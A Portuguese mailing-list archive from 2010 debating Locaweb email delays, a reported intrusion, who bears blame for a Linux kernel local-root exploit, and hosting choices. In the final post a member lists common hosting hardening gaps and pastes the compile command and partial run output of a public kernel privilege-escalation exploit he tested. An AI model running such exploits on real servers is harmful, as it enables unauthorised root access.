>>>>> To: Lista Masoch > >>>>> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails > >>>>> > >>>>> > >>>>> 12 horas pra um email chegar ??? Infelizmente isso tem sido o > >>>>> 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. > >>>>> > >>>>> ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? > mais. > >>>>> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo > >>>>> mais problema do que funcionando normal, n?o tem valido a indica??o > >>>>> mais. > >>>>> > >>>>> Pra hospedar web eu ainda indico. Mas pra email j? deixou de > ser > >>>>> uma boa op??o a mais de ano. > >>>>> > >>>>> Em 17/09/2010 09:28, Hideki Nakamura escreveu: > >>>>> > >>>>>> Bom a todos, > >>>>>> Por favor, preciso que algu?m da Locaweb entre em contato comigo > pois > >>>>>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios > >>>>>> convencionais de suporte n?o funcionaram. > >>>>>> > >>>>>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando > >>>>>> conta do recado...... Segundo o Painel de Controle "Todos os > servi?os > >>>>>> est?o funcionando normalmente"... .. mas isso n?o ? verdade. > >>>>>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails > >>>>>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram com > >>>>>> mensagem de erro para o remetente.... O atraso j? ? complicado.... a > >>>>>> sensa??o de estar perdendo e-mails ? pior ainda. > >>>>>> > >>>>> > >>>>> -- > >>>>> > >>>>> > >>>>> Atenciosamente / Sincerily, > >>>>> Leonardo Rodrigues > >>>>> Solutti Tecnologia > >>>>> http://www.solutti.com.br > >>>>> > >>>>> Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.brMy > >>>>> SPAMTRAP, do not email it > >>>>> > >>>>> > >>>>> > >>>>> > >>>>> __ > >>>>> masoch-l list > >>>>> https://eng.registro.br/mailman/listinfo/masoch-l > >>>>> > >>>> > >>>> __ > >>>> masoch-l list > >>>> https://eng.registro.br/mailman/listinfo/masoch-l > >>>> > >>>> __ > >>>> masoch-l list > >>>> https://eng.registro.br/mailman/listinfo/masoch-l > >>>> > >>>> > >>> > >>> > >>> -- > >>> < > >>> > >>> Chinese - Language of God? > >>> "Coincid?ncias" entre os ideogramas chineses e a B?blia. > >>> http://students.washington.edu/cbsf/cool/Chinese.swf > >>> > >>> > >> > >> > >> > > > > __ > > masoch-l list > > https://eng.registro.br/mailman/listinfo/masoch-l > > > > Imagine, coinscid?ncia pura!!!! > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v2.0.16 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ > > iEYEARECAAYFAkyUOMsACgkQ35zeJy7JhCi1AACfRr6CT5PgQxXLGrlfK9BW3yT6 > D3QAoIdoahD6ax+HqqwkyG6GhnbeimnX > =ENCL > -----END PGP SIGNATURE----- > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From kolt at frag.com.br Sat Sep 18 17:19:06 2010 From: kolt at frag.com.br (Guilherme Boing) Date: Sat, 18 Sep 2010 17:19:06 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> Message-ID: Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' que foi publicado com o acontecido na Locaweb ? E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de quem, dos usu?rios ? Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema for bem protegido e bem administrado. Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser executado em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. Sendo um bug de chroot de ftp, um exploit local que elevou os privil?gios do invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada pelo ocorrido, pois era de sua responsabilidade, manter o sistema tanto atualizado como bem protegido. 2010/9/18 Roberto Bert? > Viu pessoal, aproveito para divulgar o workaround e a falha, na segunda > parte do artigo tem info de como proteger. Foi bem grave mesmo > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ > < > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> > > 2010/9/18 Zhu Sha Zang > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > Em 17-09-2010 23:56, egberto escreveu: > > > Acredito que o problema com emails n?o tenha haver com este ataque. > > > > > > > > > > > > On 09/17/2010 06:38 PM, Hideki Nakamura wrote: > > >> > > > http://info.abril.com.br/noticias/internet/locaweb-sofre-ataque-cracker-17092010-33.shl > > >> > > >> > > >> > > >> 2010/9/17 Hideki Nakamura: > > >> > > >>> Parece que o problema foi resolvido (pelo menos no meu caso). Resolvi > > >>> depois de abrir um chamado para o Ombudsman. Logo que recebi o e-mail > > >>> dele, os e-mails haviam normalizado. N?o era para ser assim, mas .... > > >>> paci?ncia. > > >>> > > >>> > > >>> 2010/9/17 Cleber @ Listas: > > >>> > > >>>> Eles criaram o mx.a.locaweb.com.br utilizando o PostFix e aplicaram > > uma > > >>>> s?rie de regras para o delivery para eles. Muitos dominios novos e > > >>>> antigos > > >>>> apontam para esse MX. > > >>>> Infelizmente, essas regras n?o foram divulgadas no site ou wiki > deles. > > >>>> Seria interessante se a Locaweb tivesse uma pagina de postmaster > > >>>> assim como > > >>>> h? no Yahoo, Terra, etc. > > >>>> Abra?os, Cleber > > >>>> > > >>>> -----Mensagem original----- > > >>>> De: masoch-l-bounces at eng.registro.br > > >>>> [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre > Gorges > > >>>> Enviada em: sexta-feira, 17 de setembro de 2010 10:22 > > >>>> Para: Lista Masoch > > >>>> Assunto: Re: [MASOCH-L] Locaweb - Problemas com E-mails > > >>>> > > >>>> Presto servi?o para v?rias empresas, e de 15 dias para c?, enviar > > >>>> emails > > >>>> para Locaweb demora muito. > > >>>> > > >>>> Eu acho que a Locaweb come?ou a usar greylist para frear a entradas > > dos > > >>>> emails. > > >>>> Na fila de emails do servidores acusa o seguinte: > > >>>> > > >>>> (host mx.a.locaweb.com.br[186.202.4.42] said: 450 > > >>>> 4.7.1: > > >>>> Recipient address rejected: you are sending too many mails, slow > > >>>> down... (in > > >>>> reply to RCPT TO command)) (host mx.a.locaweb.com.br[186.202.4.42] > > >>>> said: 450 > > >>>> 4.7.1: > > >>>> Recipient address rejected: you are sending too many mails, slow > > >>>> down... (in > > >>>> reply to RCPT TO command)) > > >>>> > > >>>> Os emails ficam na fila de envio por um per?odo muito alto at? ser > > >>>> enviado > > >>>> para a Locaweb. > > >>>> > > >>>> > > >>>> []'s > > >>>> Alexandre Gorges > > >>>> http://www.google.com.br/profiles/algorges > > >>>> MSN/Skype: alexandre at dag.net.br > > >>>> ICQ: 2031408 > > >>>> > > >>>> > > >>>> > > >>>> > > >>>> > > >>>>> From: Leonardo Rodrigues > > >>>>> Reply-To: Lista Masoch > > >>>>> Date: Fri, 17 Sep 2010 10:04:32 -0300 > > >>>>> To: Lista Masoch > > >>>>> Subject: Re: [MASOCH-L] Locaweb - Problemas com E-mails > > >>>>> > > >>>>> > > >>>>> 12 horas pra um email chegar ??? Infelizmente isso tem sido o > > >>>>> 'tudo funcionando normalmente' da Locaweb nos ?ltimos tempos. > > >>>>> > > >>>>> ? uma pena, a Locaweb j? foi um ?timo provedor. Hoje n?o ? > > mais. > > >>>>> Problema todo mundo tem, ningu?m ? perfeito. Mas a Locaweb t? tendo > > >>>>> mais problema do que funcionando normal, n?o tem valido a indica??o > > >>>>> mais. > > >>>>> > > >>>>> Pra hospedar web eu ainda indico. Mas pra email j? deixou de > > ser > > >>>>> uma boa op??o a mais de ano. > > >>>>> > > >>>>> Em 17/09/2010 09:28, Hideki Nakamura escreveu: > > >>>>> > > >>>>>> Bom a todos, > > >>>>>> Por favor, preciso que algu?m da Locaweb entre em contato comigo > > pois > > >>>>>> estou com s?rios problemas de e-mails a quase 5 dias. Os meios > > >>>>>> convencionais de suporte n?o funcionaram. > > >>>>>> > > >>>>>> A situa??o est? cr?tica e o helpdesk simplesmente n?o est? dando > > >>>>>> conta do recado...... Segundo o Painel de Controle "Todos os > > servi?os > > >>>>>> est?o funcionando normalmente"... .. mas isso n?o ? verdade. > > >>>>>> Atraso (em todos os e-mails) de 12 horas ou mais... tenho e-mails > > >>>>>> enviando a 2 dias atr?s que n?o chegaram ainda... e nem voltram > com > > >>>>>> mensagem de erro para o remetente.... O atraso j? ? complicado.... > a > > >>>>>> sensa??o de estar perdendo e-mails ? pior ainda. > > >>>>>> > > >>>>> > > >>>>> -- > > >>>>> > > >>>>> > > >>>>> Atenciosamente / Sincerily, > > >>>>> Leonardo Rodrigues > > >>>>> Solutti Tecnologia > > >>>>> http://www.solutti.com.br > > >>>>> > > >>>>> Minha armadilha de SPAM, N?O mandem email > gertrudes at solutti.com.brMy > > >>>>> SPAMTRAP, do not email it > > >>>>> > > >>>>> > > >>>>> > > >>>>> > > >>>>> __ > > >>>>> masoch-l list > > >>>>> https://eng.registro.br/mailman/listinfo/masoch-l > > >>>>> > > >>>> > > >>>> __ > > >>>> masoch-l list > > >>>> https://eng.registro.br/mailman/listinfo/masoch-l > > >>>> > > >>>> __ > > >>>> masoch-l list > > >>>> https://eng.registro.br/mailman/listinfo/masoch-l > > >>>> > > >>>> > > >>> > > >>> > > >>> -- > > >>> < > > >>> > > >>> Chinese - Language of God? > > >>> "Coincid?ncias" entre os ideogramas chineses e a B?blia. > > >>> http://students.washington.edu/cbsf/cool/Chinese.swf > > >>> > > >>> > > >> > > >> > > >> > > > > > > __ > > > masoch-l list > > > https://eng.registro.br/mailman/listinfo/masoch-l > > > > > > > Imagine, coinscid?ncia pura!!!! > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v2.0.16 (GNU/Linux) > > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ > > > > iEYEARECAAYFAkyUOMsACgkQ35zeJy7JhCi1AACfRr6CT5PgQxXLGrlfK9BW3yT6 > > D3QAoIdoahD6ax+HqqwkyG6GhnbeimnX > > =ENCL > > -----END PGP SIGNATURE----- > > > > __ > > masoch-l list > > https://eng.registro.br/mailman/listinfo/masoch-l > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From roberto.berto at gmail.com Sat Sep 18 17:25:24 2010 From: roberto.berto at gmail.com (=?UTF-8?Q?Roberto_Bert=C3=B3?=) Date: Sat, 18 Sep 2010 17:25:24 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> Message-ID: Ola Guilherme, Pelos horarios que aconteceram os eventos e as informacoes no twitter. Pode ter sido outra coisa, mas duvido muito. Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat por nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a falha, ou nos que divulgaram a falha na internet junto com o exploit, ou at? mesmo nos legisladores do mundo todo por nao termos leis que criem um metodo seguro de divulgar falhas de seguranca primeiro para as empresas que podem corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. Nao ? bug de chroot de ftp. Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a execucao de comados, porque tem php, perl, etc. Entao bastava subir um binario compilado e executar ele e voce virava root. Eu reproduzi isso num ambiente de testes. 2010/9/18 Guilherme Boing > Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' que > foi publicado com o acontecido na Locaweb ? > > E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de > quem, > dos usu?rios ? > Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema for > bem protegido e bem administrado. > > Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser executado > em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. > > Sendo um bug de chroot de ftp, um exploit local que elevou os privil?gios > do > invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada pelo > ocorrido, pois era de sua responsabilidade, manter o sistema tanto > atualizado como bem protegido. > > 2010/9/18 Roberto Bert? > > > Viu pessoal, aproveito para divulgar o workaround e a falha, na segunda > > parte do artigo tem info de como proteger. Foi bem grave mesmo > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ > > < > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> > From kolt at frag.com.br Sat Sep 18 17:57:09 2010 From: kolt at frag.com.br (Guilherme Boing) Date: Sat, 18 Sep 2010 17:57:09 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> Message-ID: Roberto, Sim, a discuss?o pode ser gigante, mas a culpa, independente do que houve, ? da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram 'defaceados'. N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado corre??es e m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel de kernel. Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio algum, se tratando de plataforma web. Muito menos, garantir acesso SSH. Se a Locaweb deseja garantir, por comodidade e como um diferencial, acesso SSH aos clientes, deveria prezar primeiramente pela seguran?a dos servidores, para depois sim, tomar um passo deste. De qualquer forma, ? poss?vel manter seu sistema seguro, independente de prover o acesso SSH aos clientes ou n?o. Essa historia se resume em amadorismo. 2010/9/18 Roberto Bert? > Ola Guilherme, > > Pelos horarios que aconteceram os eventos e as informacoes no twitter. Pode > ter sido outra coisa, mas duvido muito. > > Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no > pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat por > nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a > falha, ou nos que divulgaram a falha na internet junto com o exploit, ou > at? > mesmo nos legisladores do mundo todo por nao termos leis que criem um > metodo > seguro de divulgar falhas de seguranca primeiro para as empresas que podem > corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. > > Nao ? bug de chroot de ftp. > > Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a > execucao de comados, porque tem php, perl, etc. Entao bastava subir um > binario compilado e executar ele e voce virava root. Eu reproduzi isso num > ambiente de testes. > > > > 2010/9/18 Guilherme Boing > > > Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' que > > foi publicado com o acontecido na Locaweb ? > > > > E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de > > quem, > > dos usu?rios ? > > Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema > for > > bem protegido e bem administrado. > > > > Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser > executado > > em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. > > > > Sendo um bug de chroot de ftp, um exploit local que elevou os privil?gios > > do > > invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada pelo > > ocorrido, pois era de sua responsabilidade, manter o sistema tanto > > atualizado como bem protegido. > > > > 2010/9/18 Roberto Bert? > > > > > Viu pessoal, aproveito para divulgar o workaround e a falha, na segunda > > > parte do artigo tem info de como proteger. Foi bem grave mesmo > > > > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ > > > < > > > > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From mustardahc at gmail.com Sun Sep 19 01:59:11 2010 From: mustardahc at gmail.com (Bruno Camargo) Date: Sun, 19 Sep 2010 01:59:11 -0300 Subject: [MASOCH-L] Hospedagem WEB In-Reply-To: <458000460.915511284632291056.JavaMail.root@gi4.greco.com.br> References: <458000460.915511284632291056.JavaMail.root@gi4.greco.com.br> Message-ID: Srs, Estou agradecido pelo numero de respostas. Vou estudar qual a melhor solucao para nos. Obrigado, Bruno Camargo On Thu, Sep 16, 2010 at 7:18 AM, Carlos A.. Greco wrote: > Se quizerem podemos iniciar uso compartilhado de servidores. > Tenho um rack no datacenter da telefonica com espaco de sobra. > > Greco > > Com o www.mailflex.com.br voce pode usar seus e-mails e agenda, no escritorio em casa ou no celular. > Enviado por celular. > > ----- Mensagem Original ----- > De: Renato Pinheiro de Souza > Enviada: quarta-feira, 15 de setembro de 2010 16:58 > Para: Mail Aid and Succor, On-line Comfort and Help > Assunto: Re: [MASOCH-L] Hospedagem WEB > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Se puder gastar US$ 50 / ano por conta, Google Apps > (http://www.google.com/apps/intl/en/business/index.html) para os emails. > Uso em v?rios clientes e funciona muito bem. > > []s, > Renato Pinheiro > renato.pinheiro at pobox.com > pinheiro at gmail.com > > On 15/09/10 15:42, Roberto Bert? wrote: >> Boa tarde, >> >> Esta ocorrendo um movimento do setor a respeito disso, acompanhem no Twitter >> >> http://search.twitter.com/search?q=%23hostsbrasil >> >> >> 2010/9/15 manoel Wanderley >> >>> ?Pode usar a WB Internet que ? muito boa. Tem hospedagem em linux e >>> windows, com CPANEL >>> www.wb.com.br >>> SDs >>> Manoel Wanderley >>> manoel at vetor.com.br >>> >>> ?Srs, >>>> >>>> Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? >>>> Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. >>>> Migrei para hostgator, mas em 3 dias j? observei diversas >>>> instabilidades nos servi?os de email. >>>> >>>> Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. >>>> >>>> Algu?m tem alguma dica? >>>> >>>> Grato >>>> >>>> Bruno Camargo >>>> >>>> -- >>>> BrCaBadT >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> >> > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (Darwin) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ > > iQEcBAEBAgAGBQJMkSVTAAoJEI9mFb9uQqk5b6QH/1shZvXBvmcAkF7+P/nr/f1k > FyPUMDrPOsXSG7rLwC9UOaqgaLJddvT8ems1H9A9wHQmJot4wNuCwsBywzGSj3Nr > /V01aVH9xWFS0sLGbib8NMQmlZPXWfaRGJP+27T6Df62QbYSsrlDLPc1l+VhQRYH > sZzReCWI53iJ9jmlDxWwcwAFuvHaSASsnNMJrNRWchA6uLwcnqCs7fh7MXYLRw+P > 0asjCyF19pJet9pLtgs13eu6/NORuLx13H8bu0UPgaA8dD3k9EMK2P+XcUNCHAm2 > RSmKY28JEwsgXrwp3Oj8Y6aAYM3DNIDNiIq7LtcmE85R12KZykT+LUXhArmiiUM= > =xRkq > -----END PGP SIGNATURE----- > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- BrCaBadT From marcelomf at gmail.com Sun Sep 19 15:09:39 2010 From: marcelomf at gmail.com (Marcelo M. Fleury) Date: Sun, 19 Sep 2010 15:09:39 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> Message-ID: ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da locaweb foi comprometido, em quest?o de horas os servi?os foram normalizados e isso sim ? bom. Procure por dom?nios de grandes provedores aqui: http://www.zone-h.com/archive terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando apenas de ataques que se tornaram p?blicos...). O importante ? que eles busquem aprender com o ocorrido, e com certeza isso deve acontecer, elevando ainda mais a sua maturidade. []s Em 18 de setembro de 2010 17:57, Guilherme Boing escreveu: > Roberto, > > Sim, a discuss?o pode ser gigante, mas a culpa, independente do que houve, > ? > da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram > 'defaceados'. > > N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da > pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado corre??es > e > m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel > de > kernel. > Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio algum, > se tratando de plataforma web. Muito menos, garantir acesso SSH. > > Se a Locaweb deseja garantir, por comodidade e como um diferencial, acesso > SSH aos clientes, deveria prezar primeiramente pela seguran?a dos > servidores, para depois sim, tomar um passo deste. > De qualquer forma, ? poss?vel manter seu sistema seguro, independente de > prover o acesso SSH aos clientes ou n?o. > > Essa historia se resume em amadorismo. > > 2010/9/18 Roberto Bert? > > > Ola Guilherme, > > > > Pelos horarios que aconteceram os eventos e as informacoes no twitter. > Pode > > ter sido outra coisa, mas duvido muito. > > > > Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no > > pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat > por > > nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a > > falha, ou nos que divulgaram a falha na internet junto com o exploit, ou > > at? > > mesmo nos legisladores do mundo todo por nao termos leis que criem um > > metodo > > seguro de divulgar falhas de seguranca primeiro para as empresas que > podem > > corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. > > > > Nao ? bug de chroot de ftp. > > > > Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a > > execucao de comados, porque tem php, perl, etc. Entao bastava subir um > > binario compilado e executar ele e voce virava root. Eu reproduzi isso > num > > ambiente de testes. > > > > > > > > 2010/9/18 Guilherme Boing > > > > > Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' > que > > > foi publicado com o acontecido na Locaweb ? > > > > > > E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de > > > quem, > > > dos usu?rios ? > > > Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema > > for > > > bem protegido e bem administrado. > > > > > > Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser > > executado > > > em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. > > > > > > Sendo um bug de chroot de ftp, um exploit local que elevou os > privil?gios > > > do > > > invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada > pelo > > > ocorrido, pois era de sua responsabilidade, manter o sistema tanto > > > atualizado como bem protegido. > > > > > > 2010/9/18 Roberto Bert? > > > > > > > Viu pessoal, aproveito para divulgar o workaround e a falha, na > segunda > > > > parte do artigo tem info de como proteger. Foi bem grave mesmo > > > > > > > > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ > > > > < > > > > > > > > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> > > > > > __ > > masoch-l list > > https://eng.registro.br/mailman/listinfo/masoch-l > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Att, Marcelo M. Fleury Blog - http://marcelomf.blogspot.com/ Slides - http://www.slideshare.net/marcelomf/ "O primeiro dever da intelig?ncia ? desconfiar dela mesma." By Einstein From jean.vosch at gmail.com Sun Sep 19 15:59:15 2010 From: jean.vosch at gmail.com (Jean Marcel Vosch) Date: Sun, 19 Sep 2010 15:59:15 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> Message-ID: Prepotente foi a Locaweb ao n?o informar corretamente seus usu?rios. Em 19 de setembro de 2010 15:09, Marcelo M. Fleury escreveu: > ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da > locaweb foi comprometido, em quest?o de horas os servi?os foram > normalizados > e isso sim ? bom. > > Procure por dom?nios de grandes provedores aqui: > http://www.zone-h.com/archive > > terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um > pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando > apenas de ataques que se tornaram p?blicos...). > > O importante ? que eles busquem aprender com o ocorrido, e com certeza isso > deve acontecer, elevando ainda mais a sua maturidade. > > []s > > Em 18 de setembro de 2010 17:57, Guilherme Boing >escreveu: > > > Roberto, > > > > Sim, a discuss?o pode ser gigante, mas a culpa, independente do que > houve, > > ? > > da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram > > 'defaceados'. > > > > N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da > > pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado > corre??es > > e > > m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel > > de > > kernel. > > Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio > algum, > > se tratando de plataforma web. Muito menos, garantir acesso SSH. > > > > Se a Locaweb deseja garantir, por comodidade e como um diferencial, > acesso > > SSH aos clientes, deveria prezar primeiramente pela seguran?a dos > > servidores, para depois sim, tomar um passo deste. > > De qualquer forma, ? poss?vel manter seu sistema seguro, independente de > > prover o acesso SSH aos clientes ou n?o. > > > > Essa historia se resume em amadorismo. > > > > 2010/9/18 Roberto Bert? > > > > > Ola Guilherme, > > > > > > Pelos horarios que aconteceram os eventos e as informacoes no twitter. > > Pode > > > ter sido outra coisa, mas duvido muito. > > > > > > Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no > > > pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat > > por > > > nao ter auditado, podemos por a culpa nos pesquisadores que descobriram > a > > > falha, ou nos que divulgaram a falha na internet junto com o exploit, > ou > > > at? > > > mesmo nos legisladores do mundo todo por nao termos leis que criem um > > > metodo > > > seguro de divulgar falhas de seguranca primeiro para as empresas que > > podem > > > corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. > > > > > > Nao ? bug de chroot de ftp. > > > > > > Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a > > > execucao de comados, porque tem php, perl, etc. Entao bastava subir um > > > binario compilado e executar ele e voce virava root. Eu reproduzi isso > > num > > > ambiente de testes. > > > > > > > > > > > > 2010/9/18 Guilherme Boing > > > > > > > Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' > > que > > > > foi publicado com o acontecido na Locaweb ? > > > > > > > > E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? > de > > > > quem, > > > > dos usu?rios ? > > > > Uma falha no kernel n?o garante acesso privilegiado algum, se o > sistema > > > for > > > > bem protegido e bem administrado. > > > > > > > > Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser > > > executado > > > > em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. > > > > > > > > Sendo um bug de chroot de ftp, um exploit local que elevou os > > privil?gios > > > > do > > > > invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada > > pelo > > > > ocorrido, pois era de sua responsabilidade, manter o sistema tanto > > > > atualizado como bem protegido. > > > > > > > > 2010/9/18 Roberto Bert? > > > > > > > > > Viu pessoal, aproveito para divulgar o workaround e a falha, na > > segunda > > > > > parte do artigo tem info de como proteger. Foi bem grave mesmo > > > > > > > > > > > > > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ > > > > > < > > > > > > > > > > > > > > > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> > > > > > > > __ > > > masoch-l list > > > https://eng.registro.br/mailman/listinfo/masoch-l > > > > > __ > > masoch-l list > > https://eng.registro.br/mailman/listinfo/masoch-l > > > > > > -- > Att, Marcelo M. Fleury > Blog - http://marcelomf.blogspot.com/ > Slides - http://www.slideshare.net/marcelomf/ > > "O primeiro dever da intelig?ncia ? desconfiar dela mesma." By Einstein > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From alexandre at onda.psi.br Sun Sep 19 16:16:41 2010 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Sun, 19 Sep 2010 16:16:41 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> Message-ID: <4C966199.9050006@onda.psi.br> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, n?o ? "justo" (digamos assim). A falha da locaweb ? comum em v?rias empresas de hosting: - deixar os compiladores acessiveis aos usuarios. - alguns binarios como wget, nc, etc ficam disponiveis para execucao de qualquer usuario.. - permitir a execucao de scripts. - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) consegui o exploit e fiz testes em varios servidores.. [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z [alexandre at xxx aaa]$ ./Ac1dB1tch3z Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: $$$ prepare_creds->ffffffff8024b626 $$$ override_creds->ffffffff8024b755 $$$ revert_creds->ffffffff8024bbf4 $$$ Kernel Credentials detected ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d $$$ timer_list_fops->ffffffff806bbb80 $$$ w34p0n 0f ch01c3: F0PZzZzzz $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d $$$ Prepare: m0rn1ng w0rk0ut b1tch3z $$$ Us1ng cr3d s3ash3llc0d3z $$$ 0p3n1ng th3 m4giq p0rt4l $$$ m4q1c p0rt4l l3n f0und: 